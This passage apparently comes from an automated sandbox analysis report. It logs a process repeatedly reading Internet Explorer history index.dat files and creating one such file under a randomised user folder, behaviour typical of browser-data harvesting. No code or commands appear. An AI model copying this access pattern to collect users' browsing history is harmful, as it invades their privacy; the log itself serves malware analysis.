| File | Read | filename = C:\Users\ATVeyDl98Z\AppData\Local\Microsoft\Windows\History\History.IE5\MSHist012017083120170901\index.dat, size = 256, size_out = 256 |
|
1 | |
| File | Read | filename = C:\Users\ATVeyDl98Z\AppData\Local\Microsoft\Windows\History\History.IE5\MSHist012017083120170901\index.dat, size = 8, size_out = 8 |
|
1 | |
| File | Read | filename = C:\Users\ATVeyDl98Z\AppData\Local\Microsoft\Windows\History\History.IE5\MSHist012017083120170901\index.dat, size = 256, size_out = 256 |
|
1 | |
| File | Read | filename = C:\Users\ATVeyDl98Z\AppData\Local\Microsoft\Windows\History\History.IE5\MSHist012017083120170901\index.dat, size = 8, size_out = 8 |
|
1 | |
| File | Read | filename = C:\Users\ATVeyDl98Z\AppData\Local\Microsoft\Windows\History\History.IE5\MSHist012017083120170901\index.dat, size = 256, size_out = 256 |
|
1 | |
| File | Read | filename = C:\Users\ATVeyDl98Z\AppData\Local\Microsoft\Windows\History\History.IE5\MSHist012017083120170901\index.dat, size = 8, size_out = 8 |
|
1 | |
| File | Read | filename = C:\Users\ATVeyDl98Z\AppData\Local\Microsoft\Windows\History\History.IE5\MSHist012017083120170901\index.dat, size = 256, size_out = 256 |
|
1 | |
| File | Read | filename = C:\Users\ATVeyDl98Z\AppData\Local\Microsoft\Windows\History\History.IE5\MSHist012017083120170901\index.dat, size = 8, size_out = 8 |
|
1 | |
| File | Read | filename = C:\Users\ATVeyDl98Z\AppData\Local\Microsoft\Windows\History\History.IE5\MSHist012017083120170901\index.dat, size = 256, size_out = 256 |
|
1 | |
| File | Read | filename = C:\Users\ATVeyDl98Z\AppData\Local\Microsoft\Windows\History\History.IE5\MSHist012017083120170901\index.dat, size = 8, size_out = 8 |
|
1 | |
| File | Read | filename = C:\Users\ATVeyDl98Z\AppData\Local\Microsoft\Windows\History\History.IE5\MSHist012017083120170901\index.dat, size = 256, size_out = 256 |
|
1 | |
| File | Read | filename = C:\Users\ATVeyDl98Z\AppData\Local\Microsoft\Windows\History\History.IE5\MSHist012017083120170901\index.dat, size = 8, size_out = 8 |
|
1 | |
| File | Read | filename = C:\Users\ATVeyDl98Z\AppData\Local\Microsoft\Windows\History\History.IE5\MSHist012017083120170901\index.dat, size = 256, size_out = 256 |
|
1 | |
| File | Read | filename = C:\Users\ATVeyDl98Z\AppData\Local\Microsoft\Windows\History\History.IE5\MSHist012017083120170901\index.dat, size = 8, size_out = 8 |
|
1 | |
| File | Read | filename = C:\Users\ATVeyDl98Z\AppData\Local\Microsoft\Windows\History\History.IE5\MSHist012017083120170901\index.dat, size = 256, size_out = 256 |
|
1 | |
| File | Read | filename = C:\Users\ATVeyDl98Z\AppData\Local\Microsoft\Windows\History\History.IE5\MSHist012017083120170901\index.dat, size = 8, size_out = 8 |
|
1 | |
| File | Read | filename = C:\Users\ATVeyDl98Z\AppData\Local\Microsoft\Windows\History\History.IE5\MSHist012017083120170901\index.dat, size = 256, size_out = 256 |
|
1 | |
| File | Read | filename = C:\Users\ATVeyDl98Z\AppData\Local\Microsoft\Windows\History\History.IE5\MSHist012017083120170901\index.dat, size = 8, size_out = 8 |
|
1 | |
| File | Read | filename = C:\Users\ATVeyDl98Z\AppData\Local\Microsoft\Windows\History\History.IE5\MSHist012017083120170901\index.dat, size = 256, size_out = 256 |
|
1 | |
| File | Read | filename = C:\Users\ATVeyDl98Z\AppData\Local\Microsoft\Windows\History\History.IE5\MSHist012017083120170901\index.dat, size = 8, size_out = 8 |
|
1 | |
| File | Read | filename = C:\Users\ATVeyDl98Z\AppData\Local\Microsoft\Windows\History\History.IE5\MSHist012017083120170901\index.dat, size = 256, size_out = 256 |
|
1 | |
| File | Read | filename = C:\Users\ATVeyDl98Z\AppData\Local\Microsoft\Windows\History\History.IE5\MSHist012017083120170901\index.dat, size = 8, size_out = 8 |
|
1 | |
| File | Read | filename = C:\Users\ATVeyDl98Z\AppData\Local\Microsoft\Windows\History\History.IE5\MSHist012017083120170901\index.dat, size = 256, size_out = 256 |
|
1 | |
| File | Read | filename = C:\Users\ATVeyDl98Z\AppData\Local\Microsoft\Windows\History\History.IE5\MSHist012017083120170901\index.dat, size = 8, size_out = 8 |
|
1 | |
| File | Read | filename = C:\Users\ATVeyDl98Z\AppData\Local\Microsoft\Windows\History\History.IE5\MSHist012017083120170901\index.dat, size = 256, size_out = 256 |
|
1 | |
| File | Read | filename = C:\Users\ATVeyDl98Z\AppData\Local\Microsoft\Windows\History\History.IE5\MSHist012017083120170901\index.dat, size = 8, size_out = 8 |
|
1 | |
| File | Read | filename = C:\Users\ATVeyDl98Z\AppData\Local\Microsoft\Windows\History\History.IE5\MSHist012017083120170901\index.dat, size = 256, size_out = 256 |
|
1 | |
| File | Read | filename = C:\Users\ATVeyDl98Z\AppData\Local\Microsoft\Windows\History\History.IE5\MSHist012017083120170901\index.dat, size = 8, size_out = 8 |
|
1 | |
| File | Read | filename = C:\Users\ATVeyDl98Z\AppData\Local\Microsoft\Windows\History\History.IE5\MSHist012017083120170901\index.dat, size = 256, size_out = 256 |
|
1 | |
| File | Read | filename = C:\Users\ATVeyDl98Z\AppData\Local\Microsoft\Windows\History\History.IE5\MSHist012017083120170901\index.dat, size = 8, size_out = 8 |
|
1 | |
| File | Read | filename = C:\Users\ATVeyDl98Z\AppData\Local\Microsoft\Windows\History\History.IE5\MSHist012017083120170901\index.dat, size = 256, size_out = 256 |
|
1 | |
| File | Read | filename = C:\Users\ATVeyDl98Z\AppData\Local\Microsoft\Windows\History\History.IE5\MSHist012017083120170901\index.dat, size = 8, size_out = 8 |
|
1 | |
| File | Read | filename = C:\Users\ATVeyDl98Z\AppData\Local\Microsoft\Windows\History\History.IE5\MSHist012017083120170901\index.dat, size = 256, size_out = 256 |
|
1 | |
| File | Read | filename = C:\Users\ATVeyDl98Z\AppData\Local\Microsoft\Windows\History\History.IE5\MSHist012017083120170901\index.dat, size = 8, size_out = 8 |
|
1 | |
| File | Read | filename = C:\Users\ATVeyDl98Z\AppData\Local\Microsoft\Windows\History\History.IE5\MSHist012017083120170901\index.dat, size = 256, size_out = 256 |
|
1 | |
| File | Read | filename = C:\Users\ATVeyDl98Z\AppData\Local\Microsoft\Windows\History\History.IE5\MSHist012017083120170901\index.dat, size = 8, size_out = 8 |
|
1 | |
| File | Read | filename = C:\Users\ATVeyDl98Z\AppData\Local\Microsoft\Windows\History\History.IE5\MSHist012017083120170901\index.dat, size = 256, size_out = 256 |
|
1 | |
| File | Read | filename = C:\Users\ATVeyDl98Z\AppData\Local\Microsoft\Windows\History\History.IE5\MSHist012017083120170901\index.dat, size = 8, size_out = 8 |
|
1 | |
| File | Read | filename = C:\Users\ATVeyDl98Z\AppData\Local\Microsoft\Windows\History\History.IE5\MSHist012017083120170901\index.dat, size = 256, size_out = 256 |
|
1 | |
| File | Read | filename = C:\Users\ATVeyDl98Z\AppData\Local\Microsoft\Windows\History\History.IE5\MSHist012017083120170901\index.dat, size = 8, size_out = 8 |
|
1 | |
| File | Read | filename = C:\Users\ATVeyDl98Z\AppData\Local\Microsoft\Windows\History\History.IE5\MSHist012017083120170901\index.dat, size = 256, size_out = 256 |
|
1 | |
| File | Read | filename = C:\Users\ATVeyDl98Z\AppData\Local\Microsoft\Windows\History\History.IE5\MSHist012017083120170901\index.dat, size = 8, size_out = 8 |
|
1 | |
| File | Read | filename = C:\Users\ATVeyDl98Z\AppData\Local\Microsoft\Windows\History\History.IE5\MSHist012017083120170901\index.dat, size = 256, size_out = 256 |
|
1 | |
| File | Read | filename = C:\Users\ATVeyDl98Z\AppData\Local\Microsoft\Windows\History\History.IE5\MSHist012017083120170901\index.dat, size = 8, size_out = 8 |
|
1 | |
| File | Read | filename = C:\Users\ATVeyDl98Z\AppData\Local\Microsoft\Windows\History\History.IE5\MSHist012017083120170901\index.dat, size = 256, size_out = 256 |
|
1 | |
| File | Read | filename = C:\Users\ATVeyDl98Z\AppData\Local\Microsoft\Windows\History\History.IE5\MSHist012017083120170901\index.dat, size = 8, size_out = 8 |
|
1 | |
| File | Read | filename = C:\Users\ATVeyDl98Z\AppData\Local\Microsoft\Windows\History\History.IE5\MSHist012017083120170901\index.dat, size = 256, size_out = 256 |
|
1 | |
| File | Read | filename = C:\Users\ATVeyDl98Z\AppData\Local\Microsoft\Windows\History\History.IE5\MSHist012017083120170901\index.dat, size = 8, size_out = 8 |
|
1 | |
| File | Read | filename = C:\Users\ATVeyDl98Z\AppData\Local\Microsoft\Windows\History\History.IE5\MSHist012017083120170901\index.dat, size = 256, size_out = 256 |
|
1 | |
| File | Read | filename = C:\Users\ATVeyDl98Z\AppData\Local\Microsoft\Windows\History\History.IE5\MSHist012017083120170901\index.dat, size = 8, size_out = 8 |
|
1 | |
| File | Read | filename = C:\Users\ATVeyDl98Z\AppData\Local\Microsoft\Windows\History\History.IE5\MSHist012017083120170901\index.dat, size = 256, size_out = 256 |
|
1 | |
| File | Read | filename = C:\Users\ATVeyDl98Z\AppData\Local\Microsoft\Windows\History\History.IE5\MSHist012017083120170901\index.dat, size = 8, size_out = 8 |
|
1 | |
| File | Read | filename = C:\Users\ATVeyDl98Z\AppData\Local\Microsoft\Windows\History\History.IE5\MSHist012017083120170901\index.dat, size = 256, size_out = 256 |
|
1 | |
| File | Read | filename = C:\Users\ATVeyDl98Z\AppData\Local\Microsoft\Windows\History\History.IE5\MSHist012017083120170901\index.dat, size = 8, size_out = 8 |
|
1 | |
| File | Read | filename = C:\Users\ATVeyDl98Z\AppData\Local\Microsoft\Windows\History\History.IE5\MSHist012017083120170901\index.dat, size = 256, size_out = 256 |
|
1 | |
| File | Read | filename = C:\Users\ATVeyDl98Z\AppData\Local\Microsoft\Windows\History\History.IE5\MSHist012017083120170901\index.dat, size = 8, size_out = 8 |
|
1 | |
| File | Read | filename = C:\Users\ATVeyDl98Z\AppData\Local\Microsoft\Windows\History\History.IE5\MSHist012017083120170901\index.dat, size = 256, size_out = 256 |
|
1 | |
| File | Read | filename = C:\Users\ATVeyDl98Z\AppData\Local\Microsoft\Windows\History\History.IE5\MSHist012017083120170901\index.dat, size = 8, size_out = 8 |
|
1 | |
| File | Read | filename = C:\Users\ATVeyDl98Z\AppData\Local\Microsoft\Windows\History\History.IE5\MSHist012017083120170901\index.dat, size = 256, size_out = 256 |
|
1 | |
| File | Read | filename = C:\Users\ATVeyDl98Z\AppData\Local\Microsoft\Windows\History\History.IE5\MSHist012017083120170901\index.dat, size = 8, size_out = 8 |
|
1 | |
| File | Read | filename = C:\Users\ATVeyDl98Z\AppData\Local\Microsoft\Windows\History\History.IE5\MSHist012017083120170901\index.dat, size = 256, size_out = 256 |
|
1 | |
| File | Read | filename = C:\Users\ATVeyDl98Z\AppData\Local\Microsoft\Windows\History\History.IE5\MSHist012017083120170901\index.dat, size = 8, size_out = 8 |
|
1 | |
| File | Read | filename = C:\Users\ATVeyDl98Z\AppData\Local\Microsoft\Windows\History\History.IE5\MSHist012017083120170901\index.dat, size = 256, size_out = 256 |
|
1 | |
| File | Read | filename = C:\Users\ATVeyDl98Z\AppData\Local\Microsoft\Windows\History\History.IE5\MSHist012017083120170901\index.dat, size = 8, size_out = 8 |
|
1 | |
| File | Read | filename = C:\Users\ATVeyDl98Z\AppData\Local\Microsoft\Windows\History\History.IE5\MSHist012017083120170901\index.dat, size = 256, size_out = 256 |
|
1 | |
| File | Read | filename = C:\Users\ATVeyDl98Z\AppData\Local\Microsoft\Windows\History\History.IE5\MSHist012017083120170901\index.dat, size = 8, size_out = 8 |
|
1 | |
| File | Read | filename = C:\Users\ATVeyDl98Z\AppData\Local\Microsoft\Windows\History\History.IE5\MSHist012017083120170901\index.dat, size = 256, size_out = 256 |
|
1 | |
| File | Read | filename = C:\Users\ATVeyDl98Z\AppData\Local\Microsoft\Windows\History\History.IE5\MSHist012017083120170901\index.dat, size = 8, size_out = 8 |
|
1 | |
| File | Read | filename = C:\Users\ATVeyDl98Z\AppData\Local\Microsoft\Windows\History\History.IE5\MSHist012017083120170901\index.dat, size = 256, size_out = 256 |
|
1 | |
| File | Read | filename = C:\Users\ATVeyDl98Z\AppData\Local\Microsoft\Windows\History\History.IE5\MSHist012017083120170901\index.dat, size = 8, size_out = 8 |
|
1 | |
| File | Read | filename = C:\Users\ATVeyDl98Z\AppData\Local\Microsoft\Windows\History\History.IE5\MSHist012017083120170901\index.dat, size = 256, size_out = 256 |
|
1 | |
| File | Read | filename = C:\Users\ATVeyDl98Z\AppData\Local\Microsoft\Windows\History\History.IE5\MSHist012017083120170901\index.dat, size = 8, size_out = 8 |
|
1 | |
| File | Read | filename = C:\Users\ATVeyDl98Z\AppData\Local\Microsoft\Windows\History\History.IE5\MSHist012017083120170901\index.dat, size = 256, size_out = 256 |
|
1 | |
| File | Read | filename = C:\Users\ATVeyDl98Z\AppData\Local\Microsoft\Windows\History\History.IE5\MSHist012017083120170901\index.dat, size = 8, size_out = 8 |
|
1 | |
| File | Read | filename = C:\Users\ATVeyDl98Z\AppData\Local\Microsoft\Windows\History\History.IE5\MSHist012017083120170901\index.dat, size = 256, size_out = 256 |
|
1 | |
| File | Read | filename = C:\Users\ATVeyDl98Z\AppData\Local\Microsoft\Windows\History\History.IE5\MSHist012017083120170901\index.dat, size = 8, size_out = 8 |
|
1 | |
| File | Read | filename = C:\Users\ATVeyDl98Z\AppData\Local\Microsoft\Windows\History\History.IE5\MSHist012017083120170901\index.dat, size = 256, size_out = 256 |
|
1 | |
| File | Read | filename = C:\Users\ATVeyDl98Z\AppData\Local\Microsoft\Windows\History\History.IE5\MSHist012017083120170901\index.dat, size = 8, size_out = 8 |
|
1 | |
| File | Read | filename = C:\Users\ATVeyDl98Z\AppData\Local\Microsoft\Windows\History\History.IE5\MSHist012017083120170901\index.dat, size = 256, size_out = 256 |
|
1 | |
| File | Read | filename = C:\Users\ATVeyDl98Z\AppData\Local\Microsoft\Windows\History\History.IE5\MSHist012017083120170901\index.dat, size = 8, size_out = 8 |
|
1 | |
| File | Read | filename = C:\Users\ATVeyDl98Z\AppData\Local\Microsoft\Windows\History\History.IE5\MSHist012017083120170901\index.dat, size = 256, size_out = 256 |
|
1 | |
| File | Read | filename = C:\Users\ATVeyDl98Z\AppData\Local\Microsoft\Windows\History\History.IE5\MSHist012017083120170901\index.dat, size = 8, size_out = 8 |
|
1 | |
| File | Read | filename = C:\Users\ATVeyDl98Z\AppData\Local\Microsoft\Windows\History\History.IE5\MSHist012017083120170901\index.dat, size = 256, size_out = 256 |
|
1 | |
| File | Read | filename = C:\Users\ATVeyDl98Z\AppData\Local\Microsoft\Windows\History\History.IE5\MSHist012017083120170901\index.dat, size = 8, size_out = 8 |
|
1 | |
| File | Read | filename = C:\Users\ATVeyDl98Z\AppData\Local\Microsoft\Windows\History\History.IE5\MSHist012017083120170901\index.dat, size = 256, size_out = 256 |
|
1 | |
| File | Read | filename = C:\Users\ATVeyDl98Z\AppData\Local\Microsoft\Windows\History\History.IE5\MSHist012017083120170901\index.dat, size = 8, size_out = 8 |
|
1 | |
| File | Read | filename = C:\Users\ATVeyDl98Z\AppData\Local\Microsoft\Windows\History\History.IE5\MSHist012017083120170901\index.dat, size = 256, size_out = 256 |
|
1 | |
| File | Read | filename = C:\Users\ATVeyDl98Z\AppData\Local\Microsoft\Windows\History\History.IE5\MSHist012017083120170901\index.dat, size = 8, size_out = 8 |
|
1 | |
| File | Read | filename = C:\Users\ATVeyDl98Z\AppData\Local\Microsoft\Windows\History\History.IE5\MSHist012017083120170901\index.dat, size = 256, size_out = 256 |
|
1 | |
| File | Read | filename = C:\Users\ATVeyDl98Z\AppData\Local\Microsoft\Windows\History\History.IE5\MSHist012017083120170901\index.dat, size = 8, size_out = 8 |
|
1 | |
| File | Read | filename = C:\Users\ATVeyDl98Z\AppData\Local\Microsoft\Windows\History\History.IE5\MSHist012017083120170901\index.dat, size = 256, size_out = 256 |
|
1 | |
| File | Read | filename = C:\Users\ATVeyDl98Z\AppData\Local\Microsoft\Windows\History\History.IE5\MSHist012017083120170901\index.dat, size = 8, size_out = 8 |
|
1 | |
| File | Read | filename = C:\Users\ATVeyDl98Z\AppData\Local\Microsoft\Windows\History\History.IE5\MSHist012017083120170901\index.dat, size = 256, size_out = 256 |
|
1 | |
| File | Read | filename = C:\Users\ATVeyDl98Z\AppData\Local\Microsoft\Windows\History\History.IE5\MSHist012017083120170901\index.dat, size = 8, size_out = 8 |
|
1 | |
| File | Read | filename = C:\Users\ATVeyDl98Z\AppData\Local\Microsoft\Windows\History\History.IE5\MSHist012017083120170901\index.dat, size = 256, size_out = 256 |
|
1 | |
| File | Read | filename = C:\Users\ATVeyDl98Z\AppData\Local\Microsoft\Windows\History\History.IE5\MSHist012017083120170901\index.dat, size = 8, size_out = 8 |
|
1 | |
| File | Read | filename = C:\Users\ATVeyDl98Z\AppData\Local\Microsoft\Windows\History\History.IE5\MSHist012017083120170901\index.dat, size = 256, size_out = 256 |
|
1 | |
| File | Read | filename = C:\Users\ATVeyDl98Z\AppData\Local\Microsoft\Windows\History\History.IE5\MSHist012017083120170901\index.dat, size = 8, size_out = 8 |
|
1 | |
| File | Read | filename = C:\Users\ATVeyDl98Z\AppData\Local\Microsoft\Windows\History\History.IE5\MSHist012017083120170901\index.dat, size = 256, size_out = 256 |
|
1 | |
| File | Read | filename = C:\Users\ATVeyDl98Z\AppData\Local\Microsoft\Windows\History\History.IE5\MSHist012017083120170901\index.dat, size = 8, size_out = 8 |
|
1 | |
| File | Read | filename = C:\Users\ATVeyDl98Z\AppData\Local\Microsoft\Windows\History\History.IE5\MSHist012017083120170901\index.dat, size = 256, size_out = 256 |
|
1 | |
| File | Read | filename = C:\Users\ATVeyDl98Z\AppData\Local\Microsoft\Windows\History\History.IE5\MSHist012017083120170901\index.dat, size = 8, size_out = 8 |
|
1 | |
| File | Read | filename = C:\Users\ATVeyDl98Z\AppData\Local\Microsoft\Windows\History\History.IE5\MSHist012017083120170901\index.dat, size = 256, size_out = 256 |
|
1 | |
| File | Read | filename = C:\Users\ATVeyDl98Z\AppData\Local\Microsoft\Windows\History\History.IE5\MSHist012017083120170901\index.dat, size = 8, size_out = 8 |
|
1 | |
| File | Read | filename = C:\Users\ATVeyDl98Z\AppData\Local\Microsoft\Windows\History\History.IE5\MSHist012017083120170901\index.dat, size = 256, size_out = 256 |
|
1 | |
| File | Read | filename = C:\Users\ATVeyDl98Z\AppData\Local\Microsoft\Windows\History\History.IE5\MSHist012017083120170901\index.dat, size = 8, size_out = 8 |
|
1 | |
| File | Read | filename = C:\Users\ATVeyDl98Z\AppData\Local\Microsoft\Windows\History\History.IE5\MSHist012017083120170901\index.dat, size = 256, size_out = 256 |
|
1 | |
| File | Read | filename = C:\Users\ATVeyDl98Z\AppData\Local\Microsoft\Windows\History\History.IE5\MSHist012017083120170901\index.dat, size = 8, size_out = 8 |
|
1 | |
| File | Read | filename = C:\Users\ATVeyDl98Z\AppData\Local\Microsoft\Windows\History\History.IE5\MSHist012017083120170901\index.dat, size = 256, size_out = 256 |
|
1 | |
| File | Read | filename = C:\Users\ATVeyDl98Z\AppData\Local\Microsoft\Windows\History\History.IE5\MSHist012017083120170901\index.dat, size = 8, size_out = 8 |
|
1 | |
| File | Read | filename = C:\Users\ATVeyDl98Z\AppData\Local\Microsoft\Windows\History\History.IE5\MSHist012017083120170901\index.dat, size = 256, size_out = 256 |
|
1 | |
| File | Read | filename = C:\Users\ATVeyDl98Z\AppData\Local\Microsoft\Windows\History\History.IE5\MSHist012017083120170901\index.dat, size = 8, size_out = 8 |
|
1 | |
| File | Read | filename = C:\Users\ATVeyDl98Z\AppData\Local\Microsoft\Windows\History\History.IE5\MSHist012017083120170901\index.dat, size = 256, size_out = 256 |
|
1 | |
| File | Read | filename = C:\Users\ATVeyDl98Z\AppData\Local\Microsoft\Windows\History\History.IE5\MSHist012017083120170901\index.dat, size = 8, size_out = 8 |
|
1 | |
| File | Read | filename = C:\Users\ATVeyDl98Z\AppData\Local\Microsoft\Windows\History\History.IE5\MSHist012017083120170901\index.dat, size = 256, size_out = 256 |
|
1 | |
| File | Read | filename = C:\Users\ATVeyDl98Z\AppData\Local\Microsoft\Windows\History\History.IE5\MSHist012017083120170901\index.dat, size = 8, size_out = 8 |
|
1 | |
| File | Read | filename = C:\Users\ATVeyDl98Z\AppData\Local\Microsoft\Windows\History\History.IE5\MSHist012017083120170901\index.dat, size = 256, size_out = 256 |
|
1 | |
| File | Read | filename = C:\Users\ATVeyDl98Z\AppData\Local\Microsoft\Windows\History\History.IE5\MSHist012017083120170901\index.dat, size = 8, size_out = 8 |
|
1 | |
| File | Read | filename = C:\Users\ATVeyDl98Z\AppData\Local\Microsoft\Windows\History\History.IE5\MSHist012017083120170901\index.dat, size = 256, size_out = 256 |
|
1 | |
| File | Read | filename = C:\Users\ATVeyDl98Z\AppData\Local\Microsoft\Windows\History\History.IE5\MSHist012017083120170901\index.dat, size = 8, size_out = 8 |
|
1 | |
| File | Read | filename = C:\Users\ATVeyDl98Z\AppData\Local\Microsoft\Windows\History\History.IE5\MSHist012017083120170901\index.dat, size = 256, size_out = 256 |
|
1 | |
| File | Read | filename = C:\Users\ATVeyDl98Z\AppData\Local\Microsoft\Windows\History\History.IE5\MSHist012017083120170901\index.dat, size = 8, size_out = 8 |
|
1 | |
| File | Read | filename = C:\Users\ATVeyDl98Z\AppData\Local\Microsoft\Windows\History\History.IE5\MSHist012017083120170901\index.dat, size = 256, size_out = 256 |
|
1 | |
| File | Read | filename = C:\Users\ATVeyDl98Z\AppData\Local\Microsoft\Windows\History\History.IE5\MSHist012017083120170901\index.dat, size = 8, size_out = 8 |
|
1 | |
| File | Read | filename = C:\Users\ATVeyDl98Z\AppData\Local\Microsoft\Windows\History\History.IE5\MSHist012017083120170901\index.dat, size = 256, size_out = 256 |
|
1 | |
| File | Read | filename = C:\Users\ATVeyDl98Z\AppData\Local\Microsoft\Windows\History\History.IE5\MSHist012017083120170901\index.dat, size = 8, size_out = 8 |
|
1 | |
| File | Read | filename = C:\Users\ATVeyDl98Z\AppData\Local\Microsoft\Windows\History\History.IE5\MSHist012017083120170901\index.dat, size = 256, size_out = 256 |
|
1 | |
| File | Read | filename = C:\Users\ATVeyDl98Z\AppData\Local\Microsoft\Windows\History\History.IE5\MSHist012017083120170901\index.dat, size = 8, size_out = 8 |
|
1 | |
| File | Read | filename = C:\Users\ATVeyDl98Z\AppData\Local\Microsoft\Windows\History\History.IE5\MSHist012017083120170901\index.dat, size = 256, size_out = 256 |
|
1 | |
| File | Read | filename = C:\Users\ATVeyDl98Z\AppData\Local\Microsoft\Windows\History\History.IE5\MSHist012017083120170901\index.dat, size = 8, size_out = 8 |
|
1 | |
| File | Read | filename = C:\Users\ATVeyDl98Z\AppData\Local\Microsoft\Windows\History\History.IE5\MSHist012017083120170901\index.dat, size = 256, size_out = 256 |
|
1 | |
| File | Read | filename = C:\Users\ATVeyDl98Z\AppData\Local\Microsoft\Windows\History\History.IE5\MSHist012017083120170901\index.dat, size = 8, size_out = 8 |
|
1 | |
| File | Read | filename = C:\Users\ATVeyDl98Z\AppData\Local\Microsoft\Windows\History\History.IE5\MSHist012017083120170901\index.dat, size = 256, size_out = 256 |
|
1 | |
| File | Read | filename = C:\Users\ATVeyDl98Z\AppData\Local\Microsoft\Windows\History\History.IE5\MSHist012017083120170901\index.dat, size = 8, size_out = 8 |
|
1 | |
| File | Read | filename = C:\Users\ATVeyDl98Z\AppData\Local\Microsoft\Windows\History\History.IE5\MSHist012017083120170901\index.dat, size = 256, size_out = 256 |
|
1 | |
| File | Read | filename = C:\Users\ATVeyDl98Z\AppData\Local\Microsoft\Windows\History\History.IE5\MSHist012017083120170901\index.dat, size = 8, size_out = 8 |
|
1 | |
| File | Read | filename = C:\Users\ATVeyDl98Z\AppData\Local\Microsoft\Windows\History\History.IE5\MSHist012017083120170901\index.dat, size = 256, size_out = 256 |
|
1 | |
| File | Read | filename = C:\Users\ATVeyDl98Z\AppData\Local\Microsoft\Windows\History\History.IE5\MSHist012017083120170901\index.dat, size = 8, size_out = 8 |
|
1 | |
| File | Read | filename = C:\Users\ATVeyDl98Z\AppData\Local\Microsoft\Windows\History\History.IE5\MSHist012017083120170901\index.dat, size = 256, size_out = 256 |
|
1 | |
| File | Read | filename = C:\Users\ATVeyDl98Z\AppData\Local\Microsoft\Windows\History\History.IE5\MSHist012017083120170901\index.dat, size = 8, size_out = 8 |
|
1 | |
| File | Read | filename = C:\Users\ATVeyDl98Z\AppData\Local\Microsoft\Windows\History\History.IE5\MSHist012017083120170901\index.dat, size = 256, size_out = 256 |
|
1 | |
| File | Read | filename = C:\Users\ATVeyDl98Z\AppData\Local\Microsoft\Windows\History\History.IE5\MSHist012017083120170901\index.dat, size = 8, size_out = 8 |
|
1 | |
| File | Read | filename = C:\Users\ATVeyDl98Z\AppData\Local\Microsoft\Windows\History\History.IE5\MSHist012017083120170901\index.dat, size = 256, size_out = 256 |
|
1 | |
| File | Read | filename = C:\Users\ATVeyDl98Z\AppData\Local\Microsoft\Windows\History\History.IE5\MSHist012017083120170901\index.dat, size = 8, size_out = 8 |
|
1 | |
| File | Read | filename = C:\Users\ATVeyDl98Z\AppData\Local\Microsoft\Windows\History\History.IE5\MSHist012017083120170901\index.dat, size = 256, size_out = 256 |
|
1 | |
| File | Read | filename = C:\Users\ATVeyDl98Z\AppData\Local\Microsoft\Windows\History\History.IE5\MSHist012017083120170901\index.dat, size = 8, size_out = 8 |
|
1 | |
| File | Read | filename = C:\Users\ATVeyDl98Z\AppData\Local\Microsoft\Windows\History\History.IE5\MSHist012017083120170901\index.dat, size = 256, size_out = 256 |
|
1 | |
| File | Read | filename = C:\Users\ATVeyDl98Z\AppData\Local\Microsoft\Windows\History\History.IE5\MSHist012017083120170901\index.dat, size = 8, size_out = 8 |
|
1 | |
| File | Read | filename = C:\Users\ATVeyDl98Z\AppData\Local\Microsoft\Windows\History\History.IE5\MSHist012017083120170901\index.dat, size = 256, size_out = 256 |
|
1 | |
| File | Read | filename = C:\Users\ATVeyDl98Z\AppData\Local\Microsoft\Windows\History\History.IE5\MSHist012017083120170901\index.dat, size = 8, size_out = 8 |
|
1 | |
| File | Read | filename = C:\Users\ATVeyDl98Z\AppData\Local\Microsoft\Windows\History\History.IE5\MSHist012017083120170901\index.dat, size = 256, size_out = 256 |
|
1 | |
| File | Read | filename = C:\Users\ATVeyDl98Z\AppData\Local\Microsoft\Windows\History\History.IE5\MSHist012017083120170901\index.dat, size = 8, size_out = 8 |
|
1 | |
| File | Read | filename = C:\Users\ATVeyDl98Z\AppData\Local\Microsoft\Windows\History\History.IE5\MSHist012017083120170901\index.dat, size = 256, size_out = 256 |
|
1 | |
| File | Read | filename = C:\Users\ATVeyDl98Z\AppData\Local\Microsoft\Windows\History\History.IE5\MSHist012017083120170901\index.dat, size = 8, size_out = 8 |
|
1 | |
| File | Read | filename = C:\Users\ATVeyDl98Z\AppData\Local\Microsoft\Windows\History\History.IE5\MSHist012017083120170901\index.dat, size = 256, size_out = 256 |
|
1 | |
| File | Create | filename = C:\Users\ATVeyDl98Z\AppData\Local\Microsoft\Windows\History\Low\History.IE5\index.dat, desired_access = GENERIC_READ, share_mode = FILE_SHARE_READ, FILE_SHARE_WRITE |
|
1 | |
| File | Read | filename = C:\Users\ATVeyDl98Z\AppData\Local\Microsoft\Windows\History\Low\History.IE5\index.dat, size = 32, size_out = 32 |
|
1 | |
| File | Get Info | filename = C:\Users\ATVeyDl98Z\AppData\Local\Microsoft\Windows\History\Low\History.IE5\index.dat, type = size |
|
1 | |
| File | Read | filename = C:\Users\ATVeyDl98Z\AppData\Local\Microsoft\Windows\History\Low\History.IE5\index.dat, size = 8, size_out = 8 |
|
1 | |
| File | Read | filename = C:\Users\ATVeyDl98Z\AppData\Local\Microsoft\Windows\History\Low\History.IE5\index.dat, size = 256, size_out = 256 |
|
1 | |
| File | Read | filename = C:\Users\ATVeyDl98Z\AppData\Local\Microsoft\Windows\History\Low\History.IE5\index.dat, size = 8, size_out = 8 |
|
1 | |
| File | Read | filename = C:\Users\ATVeyDl98Z\AppData\Local\Microsoft\Windows\History\Low\History.IE5\index.dat, size = 256, size_out = 256 |
|
1 | |
| File | Read | filename = C:\Users\ATVeyDl98Z\AppData\Local\Microsoft\Windows\History\Low\History.IE5\index.dat, size = 8, size_out = 8 |
|
1 | |
| File | Read | filename = C:\Users\ATVeyDl98Z\AppData\Local\Microsoft\Windows\History\Low\History.IE5\index.dat, size = 256, size_out = 256 |
|
1 | |
| File | Read | filename = C:\Users\ATVeyDl98Z\AppData\Local\Microsoft\Windows\History\Low\History.IE5\index.dat, size = 8, size_out = 8 |
|
1 | |
| File | Read | filename = C:\Users\ATVeyDl98Z\AppData\Local\Microsoft\Windows\History\Low\History.IE5\index.dat, size = 256, size_out = 256 |
|
1 | |
| File | Read | filename = C:\Users\ATVeyDl98Z\AppData\Local\Microsoft\Windows\History\Low\History.IE5\index.dat, size = 8, size_out = 8 |
|
2 | |
| File | Read | filename = C:\Users\ATVeyDl98Z\AppData\Local\Microsoft\Windows\History\Low\History.IE5\index.dat, size = 256, size_out = 256 |
|
1 | |
| File | Read | filename = C:\Users\ATVeyDl98Z\AppData\Local\Microsoft\Windows\History\Low\History.IE5\index.dat, size = 8, size_out = 8 |
|
1 | |
| File | Read | filename = C:\Users\ATVeyDl98Z\AppData\Local\Microsoft\Windows\History\Low\History.IE5\index.dat, size = 256, size_out = 256 |
|
1 | |
| File | Read | filename = C:\Users\ATVeyDl98Z\AppData\Local\Microsoft\Windows\History\Low\History.IE5\index.dat, size = 8, size_out = 8 |
|
1 | |
